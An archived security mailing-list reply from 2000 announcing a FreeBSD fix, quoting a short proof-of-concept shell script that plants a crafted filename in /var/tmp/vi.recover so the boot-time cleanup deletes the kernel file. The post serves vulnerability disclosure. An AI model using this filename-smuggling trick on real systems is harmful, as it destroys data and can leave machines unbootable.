Re: vibackup.sh

From: Kris Kennaway (krisat_private)
Date: Wed Jan 05 2000 - 02:22:40 PST

Next message: Chris Siebenmann: "Security problem with Solstice Backup/Legato Networker recover"

Previous message: John Cochran: "Re: Symlinks and Cryogenic Sleep"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This has just been fixed in FreeBSD 2.2-STABLE, 3.4-STABLE and
4.0-CURRENT. Thanks!

Kris

On Fri, 31 Dec 1999, Loneguard wrote:

> Looks like someone noticed this at some point in OpenBSD. Its broken
> rather than fixed ;(
>
> #!/bin/sh
> #
> # vibackup.sh - Loneguard 22/05/99
> # Open/FreeBSD/Debian /etc/rc script insecurely removes old vi files allowing deletion
> # of files
> #
> touch '/var/tmp/vi.recover/vi.CrazyMonkey vmlinuz'
> chmod 700 '/var/tmp/vi.recover/vi.CrazyMonkey vmlinuz'
> echo Now wait for ( or cause ) a reboot...
>

Next message: Chris Siebenmann: "Security problem with Solstice Backup/Legato Networker recover"
Previous message: John Cochran: "Re: Symlinks and Cryogenic Sleep"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 15:26:31 PDT